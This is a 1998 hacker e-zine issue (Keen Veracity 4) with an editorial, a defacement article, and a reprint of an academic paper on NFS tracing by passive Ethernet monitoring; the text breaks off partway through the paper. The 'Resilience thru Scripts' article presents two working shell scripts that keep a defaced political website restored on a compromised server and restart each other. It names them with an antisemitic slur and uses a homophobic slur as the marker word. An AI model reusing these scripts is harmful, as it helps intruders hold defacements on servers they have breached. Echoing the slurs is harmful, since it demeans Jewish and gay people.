###########################################
|              Keen Veracity              |
|          Issue 4 November 1998          |
|       Legions of the Underground        |
###########################################

And my soul passed into the data havens, and at once
I was blessed with the knowledge of a thousand men.....

[http://www.legions.org]

---------------------------------------------------------------------------
Table of Contents
---------------------------------------------------------------------------

[1x8] Introduction                                   Digital Ebola
[2x8] Resilience thru Scripts                        Duncan Silver
[3x8] NFS Tracing By Passive Network Monitoring      Matt Blaze
[4x8] Kernel Mumblings (part 1 of N)                 FooPirata
[5x8] The Internet Protocol Suite                    m0f0
[6x8] Bic Balistics                                  Nitro
[7x8] In the News                                    Sources
[8x8] Exit()                                         Digital Ebola


---------------------------------------------------------------------------
Introduction                                                  Digital Ebola
----------------------------------------------------------------------------

Well, it looks like another issue of KV is upon us. We hope to provide many
exciting things in this issue, as well as some changes. I would like to
introduce myself to you as the editor. I hope to bring you many changes, as
well as to provide the best information I possibly can. I urge anyone with
articles or suggestions to send them to us and participate in this forum;
you need not be a member of LoU to submit, as we are all members of a
greater research team, the human race. My wish is that you, as readers, take
interest in this quest for knowledge and share the wealth. May no
password or firewall hinder you in this quest. The information is out there;
all it takes is the motivation and drive to acquire it and use it. On that
note, I give you Keen Veracity 4. Hope you like it.




---------------------------------------------------------------------------
Resilience thru Scripts                                       Duncan Silver
---------------------------------------------------------------------------

Hey there kids. We are gathered here today to discuss this very
funny thing I thought of. It's nothing amazing, at least not in the
technical sense; however, it has provided us with many hours of hilarious,
enjoyable time. It all started when I found a certain politically oriented
site to be vulnerable to a variety of exploits. Seeing how the elections
are coming up in 2 weeks, we were sure this could provide a lot of exposure
for whatever points we felt like sharing with the general public. But alas, we
were saddened to find our "hacked" site remained up for a pathetic 2 minutes
and 41 seconds, for the sys administrators were alert. Our access was blocked,
our backdoors crushed beyond the point of existence. We screamed, cussed,
spilled coffee on the keyboard, and attempted to physically harm each other,
for our grief was unbearable. Hours of work, gone to waste. That's when I
got the ingenious idea. What if we could magically make sure the "hacked"
site was there, even if we weren't on the system, or didn't even have any
type of access to it? Within minutes the script was whipped together, escorted
by many hits on the head by my comrades as I made shell syntax errors. We
called it Jew. Nothing is more resilient than a Jew. And that's the idea
behind this script. I say script, although in reality there are two
scripts, bound in a variation of a client/server relationship. The basic idea
is that we have script #1 running, making sure the hacked site is where it's
supposed to be, and script #2 making sure that script #1 is running. Here is
the source of script #1, or the client. I assume you know basic shell
scripting.

#!/bin/sh
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% Program ID: 78594b32 of the delta quadroon AKA JEW.SH % %
#% Programmer : Duncan Silver of L.O.U. % %
#% Why : Practical purposes and extensive free time % %
#% Function : Client % %
#% %
#% %
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#The fourth output argument of command clock gives time in xx:xx:xx format
set $(clock)
clone="$4"
cp $0 $clone

echo $0 > ptty0001
echo $clone > ptty0002

while [ "$0" ]; do

#change path appropriatelly
grep fag /home/httpd/html/index.html > temp
set $(wc -l temp)
lines="$1"
if [ "$lines" -ge "1" ]; then

#The : command does nothing.
:
else
cp ./index.html /home/httpd/html/index.html
fi
sleep 4
done

exit 1
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Now let's take a look at the server side of it:

%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Program ID: httpd.sh %
% Function: Server %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#!/bin/sh
#function

it_is_all_good() {
:
}

it_is_all_bad() {
./$copy &
if [ -f $org ]; then
rm $org
fi

}

while [ "$0" ]; do
read org < ptty0001
read copy < ptty0002
sleep 4
ps -aux | grep $org > temp_h

set $(wc -l temp_h)
len="$1"

case "$len" in
0) it_is_all_bad;;
1) grep grep temp_h > temp_h
set $(wc -l temp_h)
if [ "$1" = "1" ]; then
it_is_all_bad
else
it_is_all_good
fi
;;

2) it_is_all_good;;
esac

done
exit 1
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Alright, now, if you are any good at all, you know what's up. For the
logically challenged ones, here is the outline in English.

* Script #1 starts up
* Makes a copy of itself with a random name
* Stores the name of itself and of the copy in ptty0001 and ptty0002 respectively
* do (never-ending loop)
* grep for a unique word in index.html to verify the hacked site is up
* IF: word found THEN: sit peacefully, check back in 4 seconds
* IF: word not found THEN: copy hacked site over index.html
* done (back to do)


* Script #2 starts up
* do (never-ending loop)
* Open ptty0001 and read whatever's in there (if you look above, ptty0001
should contain the name of the running script)
* Using ps, check if there is a process with that name

* IF: process found THEN: sit peacefully, check back in 4 seconds
* IF: process not found THEN: open ptty0002, read the name of the copy,
start the copy,
and go back to the beginning
* done (back to do)

Of course the English summary doesn't cover a few extra steps that are there
for neatness, but you get the idea. As you can see, the major flaw is that
the whole scheme is dependent upon the idea that httpd.sh remains running.
Of course we could add a line in httpd.sh to trap the kill signal and restart a
copy of itself, but I'll leave the refinements up to you (I'm not getting
paid for this, you know). What I give you is a working skeleton, with all the
major problems solved; I simply don't want to bother with the little ones.
That's my contribution to KV4, thank you for joining us, and god bless.
PS: name calling, spam mail, insults about my mother, pointless ramblings
about how l33t you are, as well as job offers, can be directed to
silver@megsinet.net



---------------------------------------------------------------------------
NFS Tracing By Passive Network Monitoring                        Matt Blaze
---------------------------------------------------------------------------

comments: mab@cs.princeton.edu

ABSTRACT

Traces of filesystem activity have proven to be useful for a wide variety of
purposes, ranging from quantitative analysis of system behavior to
trace-driven simulation of filesystem algorithms. Such traces can be
difficult to obtain, however, usually entailing modification of the
filesystems to be monitored and runtime overhead for the period of the
trace. Largely because of these difficulties, a surprisingly small number of
filesystem traces have been conducted, and few sample workloads are
available to filesystem researchers.

This paper describes a portable toolkit for deriving approximate traces of
NFS [1] activity by non-intrusively monitoring the Ethernet traffic to and
from the file server. The toolkit uses a promiscuous Ethernet listener
interface (such as the Packetfilter[2]) to read and reconstruct NFS-related
RPC packets intended for the server. It produces traces of the NFS activity
as well as a plausible set of corresponding client system calls. The tool is
currently in use at Princeton and other sites, and is available via
anonymous ftp.

1. Motivation

Traces of real workloads form an important part of virtually all analysis of
computer system behavior, whether it is program hot spots, memory access
patterns, or filesystem activity that is being studied. In the case of
filesystem activity, obtaining useful traces is particularly challenging.
Filesystem behavior can span long time periods, often making it necessary to
collect huge traces over weeks or even months. Modification of the
filesystem to collect trace data is often difficult, and may result in
unacceptable runtime overhead. Distributed filesystems exacerbate these
difficulties, especially when the network is composed of a large number of
heterogeneous machines. As a result of these difficulties, only a relatively
small number of traces of Unix filesystem workloads have been conducted,
primarily in computing research environments. [3], [4] and [5] are examples
of such traces.

Since distributed filesystems work by transmitting their activity over a
network, it would seem reasonable to obtain traces of such systems by
placing a "tap" on the network and collecting trace data based on the
network traffic. Ethernet[6] based networks lend themselves to this approach
particularly well, since traffic is broadcast to all machines connected to a
given subnetwork. A number of general-purpose network monitoring tools are
available that "promiscuously" listen to the Ethernet to which they are
connected; Sun's etherfind[7] is an example of such a tool. While these
tools are useful for observing (and collecting statistics on) specific types
of packets, the information they provide is at too low a level to be useful
for building filesystem traces. Filesystem operations may span several
packets, and may be meaningful only in the context of other, previous
operations.

Some work has been done on characterizing the impact of NFS traffic on
network load. In [8], for example, the results of a study are reported in
which Ethernet traffic was monitored and statistics gathered on NFS
activity. While useful for understanding traffic patterns and developing a
queueing model of NFS loads, these previous studies do not use the network
traffic to analyze the file access traffic patterns of the system, focusing
instead on developing a statistical model of the individual packet sources,
destinations, and types.


This paper describes a toolkit for collecting traces of NFS file access
activity by monitoring Ethernet traffic. A "spy" machine with a promiscuous
Ethernet interface is connected to the same network as the file server. Each
NFS-related packet is analyzed and a trace is produced at an appropriate
level of detail. The tool can record the low level NFS calls themselves or
an approximation of the user-level system calls (open, close, etc.) that
triggered the activity.

We partition the problem of deriving NFS activity from raw network traffic
into two fairly distinct subproblems: that of decoding the low-level NFS
operations from the packets on the network, and that of translating these
low-level commands back into user-level system calls. Hence, the toolkit
consists of two basic parts, an "RPC decoder" (rpcspy) and the "NFS analyzer"
(nfstrace). rpcspy communicates with a low-level network
monitoring facility (such as Sun's NIT [9] or the Packetfilter [2]) to read
and reconstruct the RPC transactions (call and reply) that make up each NFS
command. nfstrace takes the output of rpcspy and reconstructs the system
calls that occurred as well as other interesting data it can derive about
the structure of the filesystem, such as the mappings between NFS file
handles and Unix file names. Since there is not a clean one-to-one mapping
between system calls and lower-level NFS commands, nfstrace uses some simple
heuristics to guess a reasonable approximation of what really occurred.

1.1. A Spy's View of the NFS Protocols

It is well beyond the scope of this paper to describe the protocols used by
NFS; for a detailed description of how NFS works, the reader is referred to
[10], [11], and [12]. What follows is a very brief overview of how NFS
activity translates into Ethernet packets.

An NFS network consists of servers, to which filesystems are physically
connected, and clients, which perform operations on remote server
filesystems as if the disks were locally connected. A particular machine can
be a client or a server or both. Clients mount remote server filesystems in
their local hierarchy just as they do local filesystems; from the user's
perspective, files on NFS and local filesystems are (for the most part)
indistinguishable, and can be manipulated with the usual filesystem calls.

The interface between client and server is defined in terms of 17 remote
procedure call (RPC) operations. Remote files (and directories) are referred
to by a file handle that uniquely identifies the file to the server. There
are operations to read and write bytes of a file (read, write), obtain a
file's attributes (getattr), obtain the contents of directories (lookup,
readdir), create files (create), and so forth. While most of these
operations are direct analogs of Unix system calls, notably absent are open
and close operations; no client state information is maintained at the
server, so there is no need to inform the server explicitly when a file is
in use. Clients can maintain buffer cache entries for NFS files, but must
verify that the blocks are still valid (by checking the last write time with
the getattr operation) before using the cached data.

An RPC transaction consists of a call message (with arguments) from the
client to the server and a reply message (with return data) from the server
to the client. NFS RPC calls are transmitted using the UDP/IP connectionless,
unreliable datagram protocol[13]. The call message contains a unique
transaction identifier which is included in the reply message to enable the
client to match the reply with its call. The data in both messages is
encoded in an "external data representation" (XDR), which provides a
machine-independent standard for byte order, etc.
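
To make the decoding step concrete, a minimal sketch of how the fixed prefix
of an ONC RPC call message (transaction ID, message type, RPC version,
program, version, and procedure numbers) might be read out of a UDP payload
follows. It is based on the published RPC specification [11]; the structure
and function names are invented for illustration and are not taken from the
toolkit.

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>          /* ntohl() */

/* Fixed-size prefix of an ONC RPC call message (per the RPC spec [11]).
   The credentials, verifier, and NFS arguments that follow it are
   variable-length and are not shown here. */
struct rpc_call_prefix {
    uint32_t xid;       /* transaction ID, echoed back in the reply     */
    uint32_t msg_type;  /* 0 = call, 1 = reply                          */
    uint32_t rpcvers;   /* RPC protocol version (2)                     */
    uint32_t prog;      /* program number (100003 for NFS)              */
    uint32_t vers;      /* program version                              */
    uint32_t proc;      /* procedure number (read, write, getattr, ...) */
};

/* Decode the prefix from a raw UDP payload; returns 0 for a call message. */
int decode_rpc_call(const unsigned char *udp_data, size_t len,
                    struct rpc_call_prefix *out)
{
    uint32_t words[6];
    int i;

    if (len < sizeof(words))
        return -1;
    memcpy(words, udp_data, sizeof(words));
    for (i = 0; i < 6; i++)             /* XDR integers are big-endian */
        words[i] = ntohl(words[i]);

    out->xid      = words[0];
    out->msg_type = words[1];
    out->rpcvers  = words[2];
    out->prog     = words[3];
    out->vers     = words[4];
    out->proc     = words[5];
    return (out->msg_type == 0) ? 0 : -1;
}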

Note that the NFS server maintains no state information about its clients,
and knows nothing about the context of each operation outside of the
arguments to the operation itself.

2. The rpcspy Program

rpcspy is the interface to the system-dependent Ethernet monitoring
facility; it produces a trace of the RPC calls issued between a given set of
clients and servers. At present, there are versions of rpcspy for a number
of BSD-derived systems, including ULTRIX (with the Packetfilter[2]), SunOS
(with NIT[9]), and the IBM RT running AOS (with the Stanford enet filter).

For each RPC transaction monitored, rpcspy produces an ASCII record
containing a timestamp, the name of the server, the client, the length of
time the command took to execute, the name of the RPC command executed, and
the command- specific arguments and return data. Currently, rpcspy
understands and can decode the 17 NFS RPC commands, and there are hooks to
allow other RPC services (for example, NIS) to be added reasonably easily.


The output may be read directly or piped into another program (such as
nfstrace) for further analysis; the format is designed to be reasonably
friendly to both the human reader and other programs (such as nfstrace or
awk).

Since each RPC transaction consists of two messages, a call and a reply,
rpcspy waits until it receives both these components and emits a single
record for the entire transaction. The basic output format is 8 vertical-bar
separated fields:

timestamp | execution-time | server | client | command-name | arguments |
reply-data

where timestamp is the time the reply message was received, execution-time
is the time (in microseconds) that elapsed between the call and reply,
server is the name (or IP address) of the server, client is the name (or IP
address) of the client followed by the userid that issued the command,
command-name is the name of the particular program invoked (read, write,
getattr, etc.), and arguments and reply-data are the command dependent
arguments and return values passed to and from the RPC program,
respectively.

The exact format of the argument and reply data is dependent on the specific
command issued and the level of detail the user wants logged. For example, a
typical NFS command is recorded as follows:

690529992.167140 | 11717 | paramount | merckx.321 | read |
{"7b1f00000000083c", 0, 8192} | ok, 1871

In this example, uid 321 at client "merckx" issued an NFS read command to
server "paramount". The reply was issued at (Unix time) 690529992.167140
seconds; the call command occurred 11717 microseconds earlier. Three
arguments are logged for the read call: the file handle from which to read
(represented as a hexadecimal string), the offset from the beginning of the
file, and the number of bytes to read. In this example, 8192 bytes are
requested starting at the beginning (byte 0) of the file whose handle is
"7b1f00000000083c". The command completed successfully (status "ok"), and
1871 bytes were returned. Of course, the reply message also included the
1871 bytes of data from the file, but that field of the reply is not logged
by rpcspy.
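
A post-processor can consume these records with nothing more elaborate than a
field splitter (the paper suggests awk for quick breakdowns); the short C
sketch below, whose helper name is invented for illustration and is not part
of the toolkit, splits a record on the vertical bars and prints the
timestamp, client, server, and command fields.

#include <stdio.h>
#include <string.h>

#define MAX_FIELDS 8

/* Split one rpcspy record on '|' into trimmed field pointers.
   Returns the number of fields found; modifies `line` in place. */
static int split_record(char *line, char *fields[], int max)
{
    int n = 0;
    char *tok, *end;

    tok = strtok(line, "|");
    while (tok != NULL && n < max) {
        while (*tok == ' ')                     /* trim leading blanks  */
            tok++;
        end = tok + strlen(tok);
        while (end > tok && (end[-1] == ' ' || end[-1] == '\n'))
            *--end = '\0';                      /* trim trailing blanks */
        fields[n++] = tok;
        tok = strtok(NULL, "|");
    }
    return n;
}

int main(void)
{
    char line[512], *f[MAX_FIELDS];
    int n;

    while (fgets(line, sizeof(line), stdin) != NULL) {
        n = split_record(line, f, MAX_FIELDS);
        if (n >= 5)     /* timestamp, exec-time, server, client, command */
            printf("%s  %s -> %s  %s\n", f[0], f[3], f[2], f[4]);
    }
    return 0;
}

Piping rpcspy output through such a filter prints one line per transaction
with the timestamp, client, server, and command, which is already enough for
a crude activity summary.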

rpcspy has a number of configuration options to control which hosts and RPC
commands are traced, which call and reply fields are printed, which Ethernet
interfaces are tapped, how long to wait for reply messages, how long to run,
etc. While its primary function is to provide input for the nfstrace program
(see Section 3), judicious use of these options (as well as such programs
as grep, awk, etc.) permits its use as a simple NFS diagnostic and
performance monitoring tool. A few screens of output give a surprisingly
informative snapshot of current NFS activity; using the program, we have
quickly identified several problems that were otherwise difficult to
pinpoint. Similarly, a short awk script can provide a breakdown of the most
active clients, servers, and hosts over a sampled time period.

2.1. Implementation Issues

The basic function of rpcspy is to monitor the network, extract those
packets containing NFS data, and print the data in a useful format. Since
each RPC transaction consists of a call and a reply, rpcspy maintains a
table of pending call packets that are removed and emitted when the matching
reply arrives. In normal operation on a reasonably fast workstation, this
rarely requires more than about two megabytes of memory, even on a busy
network with unusually slow file servers. Should a server go down, however, the
queue of pending call messages (which are never matched with a reply) can
quickly become a memory hog; the user can specify a maximum size the table
is allowed to reach before these "orphaned" calls are searched out and
reclaimed.
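
One way to picture this bookkeeping is as a hash table keyed on the RPC
transaction ID, with a cap that triggers a sweep for orphans. The sketch
below illustrates the idea only; the constants and names are assumptions and
do not reflect rpcspy's actual data structures.

#include <stdlib.h>
#include <stdint.h>
#include <time.h>

#define BUCKETS     1024
#define MAX_PENDING 8192        /* assumed cap before reclaiming orphans */
#define ORPHAN_AGE  60          /* assumed age (seconds) with no reply   */

struct pending_call {
    uint32_t xid;               /* RPC transaction ID     */
    time_t   when;              /* time the call was seen */
    struct pending_call *next;
};

static struct pending_call *table[BUCKETS];
static int npending;

static void remember_call(uint32_t xid)
{
    struct pending_call *p = malloc(sizeof(*p));

    if (p == NULL)
        return;
    p->xid = xid;
    p->when = time(NULL);
    p->next = table[xid % BUCKETS];
    table[xid % BUCKETS] = p;
    npending++;
}

/* Find and unlink the call matching a reply's xid; NULL if unknown.
   The caller emits the combined record and frees the entry. */
static struct pending_call *match_reply(uint32_t xid)
{
    struct pending_call **pp;

    for (pp = &table[xid % BUCKETS]; *pp != NULL; pp = &(*pp)->next) {
        if ((*pp)->xid == xid) {
            struct pending_call *hit = *pp;
            *pp = hit->next;
            npending--;
            return hit;
        }
    }
    return NULL;
}

/* Once the table grows past MAX_PENDING, sweep out calls that never got
   a reply (for example, because the server went down). */
static void reclaim_orphans(void)
{
    time_t now = time(NULL);
    int b;

    if (npending < MAX_PENDING)
        return;
    for (b = 0; b < BUCKETS; b++) {
        struct pending_call **pp = &table[b];
        while (*pp != NULL) {
            if (now - (*pp)->when > ORPHAN_AGE) {
                struct pending_call *dead = *pp;
                *pp = dead->next;
                free(dead);
                npending--;
            } else {
                pp = &(*pp)->next;
            }
        }
    }
}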

File handles pose special problems. While all NFS file handles are a fixed
size, the number of significant bits varies from implementation to
implementation; even within a vendor, two different releases of the same
operating system might use a completely different internal handle format. In
most Unix implementations, the handle contains a filesystem identifier and
the inode number of the file; this is sometimes augmented by additional
information, such as a version number. Since programs using rpcspy output
generally will use the handle as a unique file identifier, it is important
that there not appear to be more than one handle for the same file.
Unfortunately, it is not sufficient to simply consider the handle as a
bitstring of the maximum handle size, since many operating systems do not
zero out the unused extra bits before assigning the handle. Fortunately,
most servers are at least consistent in the sizes of the handles they
assign. rpcspy allows the user to specify (on the command line or in a
startup file) the handle size for each host to be monitored. The handles
from that server are emitted as hexadecimal strings truncated at that
length. If no size is specified, a guess is made based on a few common
formats of a reasonable size.
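
The per-server truncation amounts to printing only the significant prefix of
the handle as hex. A minimal sketch, with the handle bytes and significant
length chosen arbitrarily for illustration, looks like this:

#include <stdio.h>

/* Print `nsig` significant bytes of an NFS file handle as hex.
   `nsig` would come from the per-server table or a command-line option;
   anything beyond it may be uninitialized garbage on some servers. */
static void print_handle(const unsigned char *handle, int nsig)
{
    int i;

    for (i = 0; i < nsig; i++)
        printf("%02x", handle[i]);
    putchar('\n');
}

int main(void)
{
    /* hypothetical 32-byte handle; only the first 8 bytes are significant */
    unsigned char fh[32] = { 0x7b, 0x1f, 0, 0, 0, 0, 0x08, 0x3c };

    print_handle(fh, 8);        /* prints 7b1f00000000083c */
    return 0;
}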


It is usually desirable to emit IP addresses of clients and servers as their
symbolic host names. An early version of the software simply did a
nameserver lookup each time this was necessary; this quickly flooded the
network with a nameserver request for each NFS transaction. The current
version maintains a cache of host names; this requires only a modest
amount of memory for typical networks of less than a few hundred hosts. For
very large networks or those where NFS service is provided to a large number
of remote hosts, this could still be a potential problem, but as a last
resort remote name resolution could be disabled or rpcspy configured to not
translate IP addresses.
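
A name cache of the kind described can be as simple as a table filled on
demand around the classic gethostbyaddr() interface. The following sketch is
illustrative only; the table size and names are assumptions, and real code
would also want to age out stale entries.

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define CACHE_SIZE 512          /* assumed; "a few hundred hosts" */

struct name_entry {
    struct in_addr addr;
    char name[256];
};

static struct name_entry cache[CACHE_SIZE];
static int ncached;

/* Return a host name for an IPv4 address, consulting the resolver only
   the first time a given address is seen. */
static const char *cached_name(struct in_addr addr)
{
    int i;
    struct hostent *he;

    for (i = 0; i < ncached; i++)
        if (cache[i].addr.s_addr == addr.s_addr)
            return cache[i].name;

    he = gethostbyaddr((const char *) &addr, sizeof(addr), AF_INET);
    if (ncached < CACHE_SIZE) {
        cache[ncached].addr = addr;
        strncpy(cache[ncached].name,
                he != NULL ? he->h_name : inet_ntoa(addr),
                sizeof(cache[ncached].name) - 1);
        return cache[ncached++].name;
    }
    return he != NULL ? he->h_name : inet_ntoa(addr);
}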

UDP/IP datagrams may be fragmented among several packets if the datagram is
larger than the maximum size of a single Ethernet frame. rpcspy looks only
at the first fragment; in practice, fragmentation occurs only for the data
fields of NFS read and write transactions, which are ignored anyway.

3. nfstrace: The Filesystem Tracing Package

Although rpcspy provides a trace of the low-level NFS commands, it is not,
in and of itself, sufficient for obtaining useful filesystem traces. The
low-level commands do not by themselves reveal user-level activity.
Furthermore, the volume of data that would need to be recorded is potentially
enormous, on the order of megabytes per hour. More useful would be an
abstraction of the user-level system calls underlying the NFS activity.

nfstrace is a filter for rpcspy that produces a log of a plausible set of
user level filesystem commands that could have triggered the monitored
activity. A record is produced each time a file is opened, giving a summary
of what occurred. This summary is detailed enough for analysis or for use as
input to a filesystem simulator.

The output format of nfstrace consists of 7 fields:

timestamp | command-time | direction | file-id | client | transferred | size

where timestamp is the time the open occurred, command-time is the length of
time between open and close, direction is either read or write (mkdir and
readdir count as write and read, respectively), file-id identifies the
server and the file handle, client is the client and user that performed the
open, transferred is the number of bytes of the file actually read or
written (cache hits have a 0 in this field), and size is the size of the
file (in bytes).

An example record might be as follows:

690691919.593442 | 17734 | read | basso:7b1f00000000400f | frejus.321 | 0 |
24576

Here, userid 321 at client frejus read file 7b1f00000000400f on server
basso. The file is 24576 bytes long and was able to be read from the client
cache. The command started at Unix time 690691919.593442 and took 17734
microseconds at the server to execute.
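
Because the transferred field is 0 for cache hits, an estimated client hit
rate can be computed directly from nfstrace output. The filter below is a
sketch of that calculation, assuming the 7-field format shown above; it is
not one of the toolkit's support scripts.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read nfstrace records on stdin and report the estimated cache hit
   rate for reads (transferred == 0 means the open was served from the
   client's buffer cache). Field order: timestamp | command-time |
   direction | file-id | client | transferred | size. */
int main(void)
{
    char line[512];
    char *f[7], *tok;
    long reads = 0, hits = 0;
    int n;

    while (fgets(line, sizeof(line), stdin) != NULL) {
        n = 0;
        tok = strtok(line, "|");
        while (tok != NULL && n < 7) {
            f[n++] = tok;
            tok = strtok(NULL, "|");
        }
        if (n < 7 || strstr(f[2], "read") == NULL)
            continue;                   /* not a complete read record */
        reads++;
        if (atol(f[5]) == 0)
            hits++;
    }
    if (reads > 0)
        printf("estimated hit rate: %.1f%% (%ld of %ld reads)\n",
               100.0 * hits / reads, hits, reads);
    return 0;
}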

Since it is sometimes useful to know the name corresponding to the handle
and the mode information for each file, nfstrace optionally produces a map
of file handles to file names and modes. When enough information (from
lookup and readdir commands) is received, new names are added. Names can
change over time (as files are deleted and renamed), so the times each
mapping can be considered valid is recorded as well. The mapping
information may not always be complete, however, depending on how much activity
has already been observed. Also, hard links can confuse the name mapping,
and it is not always possible to determine which of several possible names a
file was opened under.

What nfstrace produces is only an approximation of the underlying user
activity. Since there are no NFS open or close commands, the program must
guess when these system calls occur. It does this by taking advantage of the
observation that NFS is fairly consistent in what it does when a file is
opened. If the file is in the local buffer cache, a getattr call is made on
the file to verify that it has not changed since the file was cached.
Otherwise, the actual bytes of the file are fetched as they are read by the
user. (It is possible that part of the file is in the cache and part is not,
in which case the getattr is performed and only the missing pieces are
fetched. This occurs most often when a demand-paged executable is loaded).
nfstrace assumes that any sequence of NFS read calls on the same file issued
by the same user at the same client is part of a single open for read. The
close is assumed to have taken place when the last read in the sequence
completes. The end of a read sequence is detected when the same client reads
the beginning of the file again or when a timeout with no reading has
elapsed. Writes are handled in a similar manner.
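
The read-sequence heuristic can be pictured as a small state record kept per
(client, user, file handle). The sketch below is a simplified rendition of
the rules just described, with an assumed timeout value, and omits the
additional bookkeeping nfstrace actually performs.

#include <time.h>
#include <stdint.h>

#define READ_TIMEOUT 300        /* assumed idle time that ends an open */

/* One inferred "open for read" in progress for a (client, uid, handle). */
struct open_state {
    time_t   first_read;        /* when the inferred open began        */
    time_t   last_read;         /* time of the most recent read        */
    uint64_t next_offset;       /* offset a sequential read would use  */
    uint64_t bytes;             /* bytes transferred so far            */
};

/* Returns 1 if this read starts a new inferred open, in which case the
   previous one (if any) would be emitted as an open/close record. */
static int starts_new_open(const struct open_state *st, time_t now,
                           uint64_t offset)
{
    if (st->last_read == 0)
        return 1;                               /* nothing in progress  */
    if (now - st->last_read > READ_TIMEOUT)
        return 1;                               /* idle too long        */
    if (offset == 0 && st->next_offset != 0)
        return 1;                               /* re-read from the top */
    return 0;
}

static void note_read(struct open_state *st, time_t now,
                      uint64_t offset, uint64_t count)
{
    if (starts_new_open(st, now, offset)) {
        st->first_read = now;
        st->bytes = 0;
    }
    st->last_read = now;
    st->next_offset = offset + count;
    st->bytes += count;
}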


Reads that are entirely from the client cache are a bit harder; not every
getattr command is caused by a cache read, and a few cache reads take place
without a getattr. A user level stat system call can sometimes trigger a
getattr, as can an ls -l command. Fortunately, the attribute caching used by
most implementations of NFS seems to eliminate many of these extraneous
getattrs, and ls commands appear to trigger a lookup command most of the
time. nfstrace assumes that a getattr on any file that the client has read
within the past few hours represents a cache read, otherwise it is ignored.
This simple heuristic seems to be fairly accurate in practice. Note also
that a getattr might not be performed if a read occurs very soon after the
last read, but the time threshold is generally short enough that this is
rarely a problem. Still, the cached reads that nfstrace reports are, at
best, an estimate (generally erring on the side of over-reporting). There is
no way to determine the number of bytes actually read for cache hits.

The output of nfstrace is necessarily produced out of chronological order,
but may be sorted easily by a post-processor.

nfstrace has a host of options to control the level of detail of the trace,
the lengths of the timeouts, and so on. To facilitate the production of very
long traces, the output can be flushed and checkpointed at a specified
interval, and can be automatically compressed.

4. Using rpcspy and nfstrace for Filesystem Tracing

Clearly, nfstrace is not suitable for producing highly accurate traces;
cache hits are only estimated, the timing information is imprecise, and data
from lost (and duplicated) network packets are not accounted for. When such
a highly accurate trace is required, other approaches, such as modification
of the client and server kernels, must be employed.

The main virtue of the passive-monitoring approach lies in its simplicity.
In [5], Baker, et al, describe a trace of a distributed filesystem which
involved low-level modification of several different operating system
kernels. In contrast, our entire filesystem trace package consists of less
than 5000 lines of code written by a single programmer in a few weeks,
involves no kernel modifications, and can be installed to monitor multiple
heterogeneous servers and clients with no knowledge of even what operating
systems they are running.

The most important parameter affecting the accuracy of the traces is the
ability of the machine on which rpcspy is running to keep up with the
network traffic. Although most modern RISC workstations with reasonable
Ethernet interfaces are able to keep up with typical network loads, it is
important to determine how much information was lost due to packet buffer
overruns before relying upon the trace data. It is also important that the
trace be, indeed, non-intrusive. It quickly became obvious, for example,
that logging the traffic to an NFS filesystem can be problematic.

Another parameter affecting the usefulness of the traces is the validity of
the heuristics used to translate from RPC calls into user-level system
calls. To test this, a shell script was written that performed ls -l, touch,
cp and wc commands randomly in a small directory hierarchy, keeping a record
of which files were touched and read and at what time. After several hours,
nfstrace was able to detect 100% of the writes, 100% of the uncached reads,
and 99.4% of the cached reads. Cached reads were over-reported by 11%, even
though ls com mands (which cause the "phantom" reads) made up 50% of the
test activity. While this test provides encouraging evidence of the accuracy
of the traces, it is not by itself conclusive, since the particular workload
being monitored may fool nfstrace in unanticipated ways.

As in any research where data are collected about the behavior of human
subjects, the privacy of the individuals observed is a concern. Although
the contents of files are not logged by the toolkit, it is still possible to
learn something about individual users from examining what files they read
and write. At a minimum, the users of a monitored system should be informed
of the nature of the trace and the uses to which it will be put. In some
cases, it may be necessary to disable the name translation from nfstrace
when the data are being provided to others. Commercial sites where filenames
might reveal something about proprietary projects can be particularly
sensitive to such concerns.


5. A Trace of Filesystem Activity in the Princeton C.S. Department

A previous paper[14] analyzed a five-day long trace of filesystem activity
conducted on 112 research workstations at DEC-SRC. The paper identified a
number of file access properties that affect filesystem caching
performance; it is difficult, however, to know whether these properties were
unique artifacts of that particular environment or are more generally
applicable. To help answer that question, it is necessary to look at similar
traces from other computing environments.

It was relatively easy to use rpcspy and nfstrace to conduct a week long
trace of filesystem activity in the Princeton University Computer Science
Department. The departmental computing facility serves a community of
approximately 250 users, of which about 65% are researchers (faculty,
graduate students, undergraduate researchers, postdoctoral staff, etc), 5%
office staff, 2% systems staff, and the rest guests and other "external"
users. About 115 of the users work full-time in the building and use the
system heavily for electronic mail, netnews, and other such communication
services as well as other computer science research oriented tasks (editing,
compiling, and executing programs, formatting documents, etc).

The computing facility consists of a central Auspex file server (fs) (to
which users do not ordinarily log in directly), four DEC 5000/200s (elan,
hart, atomic and dynamic) used as shared cycle servers, and an assortment of
dedicated workstations (NeXT machines, Sun workstations, IBM-RTs, Iris
workstations, etc.) in individual offices and laboratories. Most users log
in to one of the four cycle servers via X window terminals located in
offices; the terminals are divided evenly among the four servers. There are
a number of Ethernets throughout the building. The central file server is
connected to a "machine room network" to which no user terminals are
directly connected; traffic to the file server from outside the machine room
is gatewayed via a Cisco router. Each of the four cycle servers has a local
/, /bin and /tmp filesystem; other filesystems, including /usr, /usr/local,
and users' home directories are NFS mounted from fs. Mail sent from local
machines is delivered locally to the (shared) fs:/usr/spool/mail; mail from
outside is delivered directly on fs.

The trace was conducted by connecting a dedicated DEC 5000/200 with a local
disk to the machine room network. This network carries NFS traffic for all
home directory access and access to all non-local cycle-server files
(including most of the actively-used programs). On a typical weekday,
about 8 million packets are transmitted over this network. nfstrace was
configured to record opens for read and write (but not directory accesses or
individual reads or writes). After one week (Wednesday to Wednesday),
342,530 opens for read and 125,542 opens for write were recorded, occupying
8 MB of (compressed) disk space. Most of this traffic was from the four
cycle servers.

No attempt was made to "normalize" the workload during the trace period.
Although users were notified that file accesses were being recorded, and
provided an opportunity to ask to be excluded from the data collection, most
users seemed to simply continue with their normal work. Similarly, no
